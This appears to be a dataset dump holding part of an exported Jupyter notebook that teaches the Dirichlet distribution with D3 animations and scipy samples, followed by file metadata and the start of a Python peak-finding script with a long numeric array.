.transition("text")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n \n \n \n svg14.append("text")\n .attr("class","hungry")\n .attr("x", width/2)\n .attr("y", (height-margin))\n .style("font-size","50px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text("🤔")\n \n function addPeople(cx,cy,e,s,c) {\n var xc = d3.scaleLinear().domain([0,d3.range(e).length]).range([Math.PI, 3*Math.PI])\n s.selectAll("text.feed_"+c)\n // Collect\n .data(d3.range(e))\n // Update\n .join("text")\n .attr("class","feed_"+c)\n .attr("x", cx)\n .attr("y", cy) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>"😃")\n .transition("text2")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((40) * Math.cos(xc(i))) + cx)\n .attr("y", (d,i)=> ((40) * Math.sin(xc(i))) + cy)\n \n \n }\n var cx = ((radius) * Math.cos(x(0))) + (width/2)\n var cy = ((radius) * Math.sin(x(0))) + (height-margin)\n addPeople(cx,cy,1,svg14,0)\n var cx = ((radius) * Math.cos(x(1))) + (width/2)\n var cy = ((radius) * Math.sin(x(1))) + (height-margin)\n addPeople(cx,cy,1,svg14,1)\n\n }\n long3()\n</script>')
# In[18]:
get_ipython().run_cell_magic('html', '', '<input type="button" onclick="long4()" value="Run Animation">\n<div id="long4"></div>\n\n<script type="text/javascript"> \n function long4() {\n var width = 600\n var height = 300\n var margin = 55\n var radius = 200\n \n d3.select("div#long4").select("svg").remove()\n var svg15 = d3.select("div#long4").append("svg")\n .attr("width", width)\n .attr("height", height)\n\n var x = d3.scaleLinear().domain([0,d3.range(5).length-1]).range([Math.PI, 2*Math.PI])\n\n svg15.selectAll("line")\n .data(d3.range(4))\n .join("line")\n .attr("x1", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y1", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("x2", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("stroke","darkgrey")\n .style("stroke-width", "10px")\n .style("stroke-linecap","round")\n .transition("line")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x2", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin)) \n\n svg15.selectAll("circle")\n // Collect\n .data(d3.range(5))\n // Update\n .join("circle")\n .attr("cx", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("r", (d,i)=> 30)\n .style("fill", (d,i)=> (i<=3)?"white":"black")\n .style("stroke", "black")\n .style("stroke-width", "1px")\n .transition("circle")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("cx", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n\n fractions = ["0","0","0","1","0"]\n svg15.selectAll("text.perc")\n // Collect\n .data(fractions)\n // Update\n .join("text")\n .attr("class","perc")\n .attr("x", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>d)\n .transition("text")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n \n \n \n svg15.append("text")\n .attr("class","hungry")\n .attr("x", width/2)\n .attr("y", (height-margin))\n .style("font-size","50px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text("🤔")\n \n function addPeople(cx,cy,e,s,c) {\n var xc = d3.scaleLinear().domain([0,d3.range(e).length]).range([Math.PI, 3*Math.PI])\n s.selectAll("text.feed_"+c)\n // Collect\n .data(d3.range(e))\n // Update\n .join("text")\n .attr("class","feed_"+c)\n .attr("x", cx)\n .attr("y", cy) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>"😃")\n .transition("text2")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((40) * Math.cos(xc(i))) + cx)\n .attr("y", (d,i)=> ((40) * Math.sin(xc(i))) + cy)\n \n \n }\n var cx = ((radius) * Math.cos(x(0))) + (width/2)\n var cy = ((radius) * Math.sin(x(0))) + (height-margin)\n addPeople(cx,cy,1,svg15,0)\n var cx = ((radius) * Math.cos(x(1))) + (width/2)\n var cy = ((radius) * Math.sin(x(1))) + (height-margin)\n addPeople(cx,cy,1,svg15,1)\n var cx = ((radius) * Math.cos(x(2))) + (width/2)\n var cy = ((radius) * Math.sin(x(2))) + (height-margin)\n addPeople(cx,cy,1,svg15,2)\n\n }\n long4()\n</script>')
# In[19]:
get_ipython().run_cell_magic('html', '', '<input type="button" onclick="long5()" value="Run Animation">\n<div id="long5"></div>\n\n<script type="text/javascript"> \n function long5() {\n var width = 600\n var height = 300\n var margin = 55\n var radius = 200\n \n d3.select("div#long5").select("svg").remove()\n var svg16 = d3.select("div#long5").append("svg")\n .attr("width", width)\n .attr("height", height)\n\n var x = d3.scaleLinear().domain([0,d3.range(5).length-1]).range([Math.PI, 2*Math.PI])\n\n svg16.selectAll("line")\n .data(d3.range(5))\n .join("line")\n .attr("x1", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y1", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("x2", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("stroke","darkgrey")\n .style("stroke-width", "10px")\n .style("stroke-linecap","round")\n .transition("line")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x2", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin)) \n\n svg16.selectAll("circle")\n // Collect\n .data(d3.range(5))\n // Update\n .join("circle")\n .attr("cx", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("r", (d,i)=> 30)\n .style("fill", (d,i)=> (i<=4)?"white":"black")\n .style("stroke", "black")\n .style("stroke-width", "1px")\n .transition("circle")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("cx", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n\n fractions = ["0","0","0","0","1"]\n svg16.selectAll("text.perc")\n // Collect\n .data(fractions)\n // Update\n .join("text")\n .attr("class","perc")\n .attr("x", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>d)\n .transition("text")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n \n \n \n svg16.append("text")\n .attr("class","hungry")\n .attr("x", width/2)\n .attr("y", (height-margin))\n .style("font-size","50px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text("🤔")\n \n function addPeople(cx,cy,e,s,c) {\n var xc = d3.scaleLinear().domain([0,d3.range(e).length]).range([Math.PI, 3*Math.PI])\n s.selectAll("text.feed_"+c)\n // Collect\n .data(d3.range(e))\n // Update\n .join("text")\n .attr("class","feed_"+c)\n .attr("x", cx)\n .attr("y", cy) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>"😃")\n .transition("text2")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((40) * Math.cos(xc(i))) + cx)\n .attr("y", (d,i)=> ((40) * Math.sin(xc(i))) + cy)\n \n \n }\n var cx = ((radius) * Math.cos(x(0))) + (width/2)\n var cy = ((radius) * Math.sin(x(0))) + (height-margin)\n addPeople(cx,cy,1,svg16,0)\n var cx = ((radius) * Math.cos(x(1))) + (width/2)\n var cy = ((radius) * Math.sin(x(1))) + (height-margin)\n addPeople(cx,cy,1,svg16,1)\n var cx = ((radius) * Math.cos(x(2))) + (width/2)\n var cy = ((radius) * Math.sin(x(2))) + (height-margin)\n addPeople(cx,cy,1,svg16,2)\n var cx = ((radius) * Math.cos(x(3))) + (width/2)\n var cy = ((radius) * Math.sin(x(3))) + (height-margin)\n addPeople(cx,cy,1,svg16,3)\n\n }\n long5()\n</script>')
# In[ ]:
# ## The Conclusions
#
# ### ✨1st Conclusion✨
#
# So, let's take a look at all three of these scenario results.
# In[20]:
get_ipython().run_cell_magic('html', '', '<input type="button" value="✨1st Conclusion✨" style="font-size:20px" onclick="conclusion1()">\n<div id="conc"></div>\n\n<script type="text/javascript"> \n var svg17, x, y\n function conclusion1() {\n var equation = ["+","+","+","+","= 1"]\n d3.range(3).forEach((d,row)=>{\n svg17.selectAll("text.equ_"+row)\n // Collect\n .data(equation)\n // Update\n .join("text")\n .attr("class","equ_"+row)\n .attr("x", 0)\n .attr("y", y(row)) \n .style("font-size","20px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>d) \n .transition("text2")\n .duration(1000)\n .delay((d,i)=> (5-i) * 100)\n .attr("x", (d,i)=> (i==4) ? (x(i+1)) : (x(i)+x(i+1))/2)\n \n })\n\n\n }\n function conc() {\n var width = 600\n var height = 400\n var margin = 65\n var radius = 200\n \n d3.select("div#conc").select("svg").remove()\n svg17 = d3.select("div#conc").append("svg")\n .attr("width", width)\n .attr("height", height)\n\n x = d3.scaleLinear().range([margin,width-margin]).domain([0,6])\n y = d3.scaleLinear().range([margin,height-margin]).domain([0,2])\n \n fractions = ["1","0","0","0","0"]\n svg17.selectAll("circle.row1")\n .data(fractions)\n .join("circle")\n .attr("class","row1")\n .attr("cx", (d,i)=> x(i))\n .attr("cy", y(0)) \n .attr("r", 20)\n .style("fill", "white")\n .style("stroke", "black")\n .style("stroke-width", "1px")\n \n svg17.selectAll("text.perc1")\n // Collect\n .data(fractions)\n // Update\n .join("text")\n .attr("class","perc1")\n .attr("x", (d,i)=> x(i))\n .attr("y", y(0)) \n .style("font-size","20px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>d)\n\n \n fractions = ["1/5","1/5","1/5","1/5","1/5"]\n svg17.selectAll("circle.row2")\n .data(fractions)\n .join("circle")\n .attr("class","row2")\n .attr("cx", (d,i)=> x(i))\n .attr("cy", y(1)) \n .attr("r", 20)\n .style("fill", "white")\n .style("stroke", "black")\n .style("stroke-width", "1px")\n\n svg17.selectAll("text.perc2")\n // Collect\n .data(fractions)\n // Update\n .join("text")\n .attr("class","perc2")\n .attr("x", (d,i)=> x(i))\n .attr("y", y(1)) \n .style("font-size","20px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>d)\n\n \n fractions = ["0","0","0","0","1"]\n svg17.selectAll("circle.row3")\n .data(fractions)\n .join("circle")\n .attr("class","row3")\n .attr("cx", (d,i)=> x(i))\n .attr("cy", y(2)) \n .attr("r", 20)\n .style("fill", "white")\n .style("stroke", "black")\n .style("stroke-width", "1px")\n\n svg17.selectAll("text.perc3")\n // Collect\n .data(fractions)\n // Update\n .join("text")\n .attr("class","perc3")\n .attr("x", (d,i)=> x(i))\n .attr("y", y(2)) \n .style("font-size","20px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>d)\n\n \n svg17.append("text")\n .attr("class","title1")\n .attr("x", 20)\n .attr("y", y(0)-45) \n .style("font-size","20px")\n .style("alignment-baseline","middle")\n .text("The Social Butterfly") \n \n svg17.append("text")\n .attr("class","title1")\n .attr("x", 20)\n .attr("y", y(1)-45) \n .style("font-size","20px")\n .style("alignment-baseline","middle")\n .text("The Gambler") \n\n svg17.append("text")\n .attr("class","title1")\n .attr("x", 20)\n .attr("y", y(2)-45) \n .style("font-size","20px")\n .style("alignment-baseline","middle")\n .text("The Long Day") \n \n function addPeople(cx,cy,e,s,c) {\n var xc = d3.scaleLinear().domain([0,d3.range(e).length]).range([Math.PI, 3*Math.PI])\n s.selectAll("text.feed_"+c)\n // Collect\n .data(d3.range(e))\n // Update\n .join("text")\n .attr("class","feed_"+c)\n .attr("x", (d,i)=> ((20) * Math.cos(xc(i))) + cx)\n .attr("y", (d,i)=> ((20) * Math.sin(xc(i))) + cy)\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>"😃")\n\n \n \n }\n var cx = x(0)\n var cy = y(0)\n addPeople(cx,cy,4,svg17,0)\n \n d3.range(4).forEach((d,i) => {\n var cx = x(i)\n var cy = y(1)\n addPeople(cx,cy,1,svg17,i+1)\n \n })\n\n var cx = x(4)\n var cy = y(2)\n addPeople(cx,cy,4,svg17,6)\n\n\n }\n conc()\n</script>')
# Our ✨1st Conclusion✨ is that for each scenerio, the total probablities (when added together), equal 1. This is our first connection the *Dirichlet Distribution*.
# ```{admonition} Dirichlet Distribution Always Sum to 1
# :class: tip
# Regardless of the number of tables (⚪), the number of people at the tables (😃), or a hungry persons' (🤔) strategy. The total probability will be 1. This is also consider to be a *probability mass function* or PMF property.
# ```
# ### ✨2nd Conclusion✨
#
# This easiest to see with our "The Gambler" scenerio.
# In[21]:
get_ipython().run_cell_magic('html', '', '<input type="button" value="✨2nd Conclusion✨" style="font-size:20px" onclick="conclusion2()">\n<div id="conc2"></div>\n\n<script type="text/javascript"> \n var svg18, x, y\n var width = 600\n var height = 400\n var margin = 65\n var radius = 200\n function conclusion2() {\n conc2()\n svg18.selectAll("circle#face_4")\n .transition("move1")\n .duration(1000)\n .attr("cx", (d,i)=> x(5))\n \n svg18.selectAll("text#face_4")\n .transition("move2")\n .duration(1000)\n .attr("x", (d,i)=> x(5))\n \n svg18.selectAll("text#feed_5")\n .transition("move2b")\n .duration(1000)\n .attr("x", (d,i)=> x(5)-20)\n \n svg18.append("line")\n .attr("id","join")\n .attr("x1", (x(3) + x(0))/2)\n .attr("y1", (y(1)+y(0))/2)\n .attr("x2", (x(3) + x(0))/2)\n .attr("y2", (y(1)+y(0))/2)\n .style("stroke", "purple")\n .style("stroke-width", "3px")\n .transition("move3")\n .duration(1000)\n .attr("x1", x(0) - 10)\n .attr("x2", x(3) + 10)\n \n svg18.append("line")\n .attr("id","join")\n .attr("x1", (x(6) + x(4))/2)\n .attr("y1", (y(1)+y(0))/2)\n .attr("x2", (x(6) + x(4))/2)\n .attr("y2", (y(1)+y(0))/2)\n .style("stroke", "steelblue")\n .style("stroke-width", "3px")\n .transition("move4")\n .duration(1000)\n .attr("x1", x(4) - 10)\n .attr("x2", x(6) + 10)\n \n svg18.append("text")\n .attr("id","join")\n .attr("x", (d,i)=> - 10)\n .attr("y", y(1)) \n .style("font-size","20px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text("To Join")\n .transition("move5")\n .duration(1000)\n .attr("x", (x(3) + x(0))/2) \n \n svg18.append("text")\n .attr("id","join")\n .attr("x", (d,i)=> width + 10)\n .attr("y", y(1)) \n .style("font-size","20px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text("Or Not To Join")\n .transition("move6")\n .duration(1000)\n .attr("x", (x(6) + x(4))/2) \n \n svg18.append("text")\n .attr("id","join")\n .attr("x", (d,i)=> ((x(4) - 10)+(x(3) + 10))/2)\n .attr("y", -10) \n .style("font-size","20px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text("+")\n .transition("move6")\n .duration(1000)\n .attr("y", (y(1)+y(0))/2)\n \n \n function createEquation1(cx,cy,top) {\n svg18.append("text")\n .attr("x", cx)\n .attr("y", height+10) \n .style("font-size","20px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(top)\n .transition("move6")\n .duration(1000)\n .attr("y", y(2)-15)\n \n svg18.append("line")\n .attr("x1", cx)\n .attr("y1", 0) \n .attr("x2", cx)\n .attr("y2", 0)\n .style("stroke", (top == "🤔") ? "steelblue" : "purple")\n .style("stroke-width", "3px")\n .transition("move7")\n .duration(1000)\n .attr("y1", cy)\n .attr("y2", cy)\n .transition("move8")\n .duration(1000)\n .attr("x1", cx-20)\n .attr("x2", cx+20)\n \n svg18.append("text")\n .attr("x", cx)\n .attr("y", height+10) \n .style("font-size","10px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text("😃😃😃😃🤔")\n .transition("move8")\n .duration(1000)\n .attr("y", y(2)+15)\n \n }\n function createEquation2(cx,top) {\n svg18.append("text")\n .attr("x", cx)\n .attr("y", height+10) \n .style("font-size",(top=="= 1") ? "30px" : "20px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(top)\n .transition("move6")\n .duration(1000)\n .attr("y", y(2))\n\n }\n createEquation1(x(0),y(2),"😃")\n createEquation2((x(0)+x(1))/2,"+")\n \n createEquation1(x(1),y(2),"😃")\n createEquation2((x(1)+x(2))/2,"+") \n \n createEquation1(x(2),y(2),"😃")\n createEquation2((x(2)+x(3))/2,"+")\n \n createEquation1(x(3),y(2),"😃")\n createEquation2((x(3)+x(4))/2,"+")\n \n createEquation1(x(5),y(2),"🤔")\n createEquation2((x(6)),"= 1")\n }\n function conc2() {\n \n d3.select("div#conc2").select("svg").remove()\n svg18 = d3.select("div#conc2").append("svg")\n .attr("width", width)\n .attr("height", height)\n\n x = d3.scaleLinear().range([margin,width-margin]).domain([0,6])\n y = d3.scaleLinear().range([margin,height-margin]).domain([0,2])\n \n\n \n fractions = ["1/5","1/5","1/5","1/5","1/5"]\n svg18.selectAll("circle.row2")\n .data(fractions)\n .join("circle")\n .attr("id",(d,i)=> "face_"+i)\n .attr("class","row2")\n .attr("cx", (d,i)=> x(i))\n .attr("cy", y(0)) \n .attr("r", 20)\n .style("fill", "white")\n .style("stroke", "black")\n .style("stroke-width", "1px")\n\n svg18.selectAll("text.perc2")\n // Collect\n .data(fractions)\n // Update\n .join("text")\n .attr("id",(d,i)=> "face_"+i)\n .attr("class","perc2")\n .attr("x", (d,i)=> x(i))\n .attr("y", y(0)) \n .style("font-size","20px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>d)\n \n svg18.append("text")\n .attr("class","title1")\n .attr("x", 20)\n .attr("y", y(0)-45) \n .style("font-size","20px")\n .style("alignment-baseline","middle")\n .text("The Gambler - 🤔") \n \n\n\n\n \n function addPeople(cx,cy,e,s,c) {\n var xc = d3.scaleLinear().domain([0,d3.range(e).length]).range([Math.PI, 3*Math.PI])\n s.selectAll("text.feed_"+c)\n // Collect\n .data(d3.range(e))\n // Update\n .join("text")\n .attr("class","feed_"+c)\n .attr("id","feed_"+c)\n .attr("x", (d,i)=> ((20) * Math.cos(xc(i))) + cx)\n .attr("y", (d,i)=> ((20) * Math.sin(xc(i))) + cy)\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>(c==5)?"🤔":"😃")\n\n \n \n }\n\n \n d3.range(5).forEach((d,i) => {\n var cx = x(i)\n var cy = y(0)\n addPeople(cx,cy,1,svg18,i+1)\n \n })\n\n\n\n }\n conc2()\n</script>')
# ```{admonition} When All Possibility Are Equally Likely
# :class: tip
# In situations where are all possibility are equally likely (equally likely to sit at a table with someone else (⚪&😃) or sit at a new table (⚪)), we can abbreviate this to a simple probablity:
#
# $\frac{😃}{😃😃😃😃}$ $=$ $\frac{Number of people sitting at table(⚪&😃)}{All people (😃😃😃😃)}$ $= $ $\frac{Nj}{N}$
# ```
# In[22]:
from scipy.stats import dirichlet
import numpy as np
# In[23]:
alpha = np.array([0.01, 0.01, 0.01, 0.01, 0.01])
np.around(dirichlet.rvs(alpha, size=5), decimals=1)
# In[24]:
alpha = np.array([0.1, 0.1, 0.1, 0.1, 0.1])
np.around(dirichlet.rvs(alpha, size=5), decimals=1)
# In[25]:
alpha = np.array([1, 1, 1, 1, 1])
np.around(dirichlet.rvs(alpha, size=5), decimals=1)
# In[26]:
alpha = np.array([5, 5, 5, 5, 5])
np.around(dirichlet.rvs(alpha, size=5), decimals=1)
# In[27]:
alpha = np.array([20, 20, 20, 20, 20])
np.around(dirichlet.rvs(alpha, size=5), decimals=1)
# In[28]:
alpha = np.array([100, 100, 100, 100, 100])
np.around(dirichlet.rvs(alpha, size=5), decimals=1)
# In[29]:
alpha = np.array([0.01, .1, 1, 10, 10])
np.around(dirichlet.mean(alpha), decimals=3)
# In[ ]:
| 261.734568
| 7,889
| 0.4521
| 11,928
| 84,802
| 3.214873
| 0.040409
| 0.06389
| 0.027382
| 0.023001
| 0.854226
| 0.837901
| 0.823637
| 0.816674
| 0.808955
| 0.786372
| 0
| 0.043631
| 0.306479
| 84,802
| 323
| 7,890
| 262.544892
| 0.606628
| 0.051496
| 0
| 0.190476
| 0
| 0.428571
| 0.975396
| 0.246696
| 0.047619
| 0
| 0
| 0
| 0
| 1
| 0.02381
| false
| 0
| 0.119048
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
a25a05132e09d85228137b957fe3561d9399893e
| 8,197
|
py
|
Python
|
findpeaks.py
|
toyjack/wbKiridashi
|
3a2c49136615cb97965a374ba1ad404dccd92cb9
|
[
"MIT"
] | null | null | null |
findpeaks.py
|
toyjack/wbKiridashi
|
3a2c49136615cb97965a374ba1ad404dccd92cb9
|
[
"MIT"
] | null | null | null |
findpeaks.py
|
toyjack/wbKiridashi
|
3a2c49136615cb97965a374ba1ad404dccd92cb9
|
[
"MIT"
] | null | null | null |
import numpy as np
from matplotlib import pyplot
import peakutils
from scipy import signal
y=np.array([0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,6,7,9,10,11,13,15,17,19,21,22,24,25,31,37,46,48,51,53,56,59,60,59,57,56,52,48,46,42,40,38,36,33,32,31,29,28,24,24,25,23,22,21,20,17,16,17,17,18,18,33,43,51,60,67,71,83,86,85,86,84,83,81,70,46,35,33,30,28,22,20,18,18,17,16,15,15,13,12,12,10,10,8,6,5,6,6,7,8,9,11,13,14,14,14,13,12,12,11,12,12,21,25,28,31,32,35,34,37,41,46,45,44,37,31,23,33,35,33,34,38,44,53,60,64,66,60,54,39,32,34,39,41,41,42,47,50,53,65,71,76,54,49,47,44,42,41,39,29,31,28,27,37,44,49,49,49,50,50,47,43,37,30,28,28,29,30,30,32,34,38,49,53,53,54,55,61,58,47,42,36,24,12,10,8,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,9,13,15,19,21,23,27,30,33,36,36,38,40,51,51,52,55,47,42,40,38,43,46,50,51,48,45,42,41,40,41,43,51,54,54,55,54,54,62,59,60,63,64,60,58,53,50,49,47,43,40,40,37,41,42,43,45,47,49,52,55,54,54,48,46,42,47,59,74,74,63,65,65,67,63,59,57,55,56,57,56,60,68,64,59,57,54,50,49,43,36,36,35,48,56,53,52,50,47,50,48,40,35,31,24,20,19,19,17,17,17,16,15,15,14,13,13,12,11,10,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,6,8,10,13,15,18,19,19,19,20,21,22,23,24,25,26,35,40,45,47,50,54,56,58,59,59,60,61,63,63,63,65,66,66,69,73,75,76,79,78,76,74,73,72,72,73,69,62,53,49,39,32,30,29,24,24,23,22,21,21,20,17,16,16,12,6,6,6,7,7,7,7,7,7,7,7,7,7,7,6,6,6,5,4,1,0,0,0,1,3,5,6,6,6,8,11,15,18,35,41,46,50,54,59,59,60,61,59,61,58,55,54,52,47,34,32,30,30,34,37,43,52,55,57,57,55,53,51,48,46,41,33,29,32,33,51,57,59,70,70,66,59,59,60,63,63,56,52,43,38,37,33,28,28,28,34,41,48,52,56,61,60,61,61,56,52,47,36,27,21,22,22,22,23,24,23,24,26,34,35,38,42,46,45,45,44,44,41,17,9,5,0,0,0,0,0,0,0,5,7,9,10,10,11,11,11,11,11,11,11,11,12,12,13,18,25,29,33,37,40,40,37,38,39,36,34,33,35,35,42,50,59,62,67,64,53,40,38,34,34,37,38,41,50,51,50,51,51,53,53,56,63,73,80,77,55,53,50,47,44,40,37,28,30,34,46,51,49,47,44,42,40,39,38,31,31,31,32,32,32,34,38,43,42,38,38,36,35,33,31,29,28,23,20,17,10,11,12,12,13,13,14,13,12,9,5,0,0,0,0,0,0,9,14,18,22,23,25,29,32,36,36,38,39,42,55,61,62,57,57,59,61,55,51,47,44,42,39,39,41,39,40,40,46,50,53,58,52,53,52,52,51,54,54,57,64,63,64,62,57,57,53,46,47,46,47,46,44,40,47,50,48,60,68,74,80,85,85,90,91,84,75,70,61,59,60,58,57,52,48,45,46,47,45,44,43,43,50,54,54,60,62,59,63,70,69,65,63,62,56,49,45,46,48,45,39,34,22,16,16,15,15,14,14,13,13,11,11,9,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,10,12,22,23,24,27,30,31,30,30,30,33,35,36,39,40,40,40,44,46,51,61,67,71,73,76,79,81,80,79,79,79,79,74,74,74,71,71,72,73,73,74,78,79,83,85,89,91,114,110,111,112,108,108,105,103,101,97,95,91,87,84,81,77,74,70,42,28,26,23,19,13,13,12,10,9,8,6,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,16,24,33,37,40,42,46,49,48,47,46,45,45,44,43,37,34,28,25,26,27,32,33,34,36,40,41,41,41,39,41,41,44,48,53,59,63,68,77,69,67,71,76,80,79,72,69,67,66,64,61,60,64,66,68,63,74,74,75,71,74,72,72,70,71,71,70,69,68,66,67,61,51,49,48,50,45,40,39,38,38,37,36,35,35,33,33,27,19,16,15,12,12,12,12,12,13,12,12,14,14,14,14,14,14,14,12,12,12,11,11,9,9,7,6,4,0,0,0,0,4,7,9,11,13,15,18,21,25,30,31,31,38,39,39,36,37,35,33,35,35,34,28,26,26,24,22,24,23,22,20,22,34,42,43,47,48,50,52,56,52,50,48,47,46,42,43,39,40,39,32,28,22,25,25,26,24,25,25,24,26,29,32,38,46,41,43,48,52,55,51,50,51,50,50,50,53,52,51,51,51,48,48,46,43,41,34,35,34,34,31,29,27,19,12,12,11,11,10,10,9,6,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,5,6,7,8,9,11,12,13,15,15,17,22,28,32,36,39,47,58,58,57,58,57,56,54,55,54,54,55,53,52,46,47,47,49,53,56,59,62,64,64,63,61,63,61,59,58,51,45,35,33,29,27,26,23,21,20,19,18,17,16,16,14,13,15,15,14,13,11,14,18,20,21,21,21,21,20,20,19,20,20,19,20,20,21,21,30,35,37,38,37,37,36,35,33,32,31,31,33,35,36,36,39,41,42,45,48,49,56,57,56,55,54,53,51,28,24,24,23,23,24,24,24,25,24,25,24,25,26,25,26,26,26,26,26,26,37,42,53,68,76,84,94,96,89,80,76,73,71,66,63,59,57,53,49,46,40,34,25,11,3,0,0,0,0,0,3,5,6,10,12,14,16,19,18,11,7,9,7,8,8,7,9,10,16,18,17,19,23,32,37,36,34,32,28,19,9,6,15,20,21,21,23,22,21,20,18,15,27,44,46,45,43,41,35,23,21,19,21,20,26,33,29,28,27,30,36,40,36,35,31,24,18,20,21,22,38,45,43,40,35,34,32,15,15,18,18,19,18,21,22,20,19,14,14,14,15,14,12,12,12,13,13,14,14,14,14,14,14,14,14,14,14,14,15,15,15,15,16,16,16,15,15,15,14,14,13,11,11,9,9,7,6,2,0,0,0,0,0,0,0,0,0,0,0,13,19,29,43,47,48,48,50,51,48,40,35,30,27,34,38,38,37,41,39,37,37,36,39,43,50,56,71,80,82,82,68,64,66,58,62,60,53,45,40,37,34,29,26,15,17,13,21,31,50,58,60,64,66,66,64,62,56,53,47,41,41,43,38,44,46,46,46,46,45,47,50,52,52,54,56,57,60,62,64,65,65,58,50,49,51,51,54,55,58,59,58,57,57,57,55,58,55,51,48,47,47,45,42,39,44,46,43,42,47,51,39,30,25,20,14,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,9,11,12,12,12,12,12,12,11,15,20,25,28,29,29,31,32,35,34,36,42,49,54,50,46,43,38,35,36,38,50,57,70,71,71,71,76,79,80,85,88,86,82,82,80,82,83,85,85,83,77,74,73,71,68,68,68,65,61,60,57,53,52,55,59,59,58,51,45,42,40,39,42,47,55,64,69,86,99,97,93,90,91,82,75,61,43,25,23,20,18,16,13,11,8,6,0,0,0,0,0,0,0,0,8,13,17,22,23,23,19,20,21,21,21,20,22,23,25,28,31,30,32,34,37,38,39,40,40,41,41,39,32,23,22,21,20,20,18,19,20,21,24,24,25,29,32,37,39,42,47,48,42,45,49,46,40,35,33,33,27,29,25,22,23,26,28,28,37,40,43,46,47,